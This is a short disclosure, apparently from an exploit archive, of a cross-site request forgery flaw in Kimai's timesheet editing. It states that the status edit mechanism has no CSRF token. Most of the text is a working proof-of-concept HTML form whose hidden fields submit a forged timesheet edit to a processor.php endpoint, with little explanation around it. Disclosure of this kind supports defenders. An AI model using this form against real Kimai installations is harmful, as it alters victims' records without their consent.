Kimai.org Cross Site Request Forgery

`# Affected software: http://kimai.org  
# Type of vulnerability: csrf  
# URL: http://demo.kimai.org  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
# Description: csrf vulnerability in status edit mechanism due to no csrf  
token  
# Proof of concept:  
<html>  
  
<body>  
<form action="  
http://demo.kimai.org/extensions/ki_timesheets/processor.php"  
method="POST">  
<input type="hidden" name="id" value="7" />  
<input type="hidden" name="axAction"  
value="add_edit_timeSheetEntry" />  
<input type="hidden" name="projectID" value="2" />  
<input type="hidden" name="filter" value="" />  
<input type="hidden" name="activityID" value="1" />  
<input type="hidden" name="filter" value="" />  
<input type="hidden" name="description"  
value="ZxcZlololololololololoxcfrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr"  
/>  
<input type="hidden" name="start_day" value="14.10.2014"  
/>  
<input type="hidden" name="end_day" value="15.10.2014" />  
<input type="hidden" name="start_time" value="14:44:07" />  
<input type="hidden" name="end_time" value="02:44:07" />  
<input type="hidden" name="duration" value="12:00:00" />  
<input type="hidden" name="location" value="" />  
<input type="hidden" name="trackingNumber" value="" />  
<input type="hidden" name="comment" value="" />  
<input type="hidden" name="commentType" value="0" />  
<input type="hidden" name="userID" value="340622533" />  
<input type="hidden" name="budget" value="0.00" />  
<input type="hidden" name="approved" value="0.00" />  
<input type="hidden" name="statusID" value="1" />  
<input type="hidden" name="billable" value="0" />  
<input type="hidden" name="rate" value="0.00" />  
<input type="hidden" name="fixedRate" value="" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`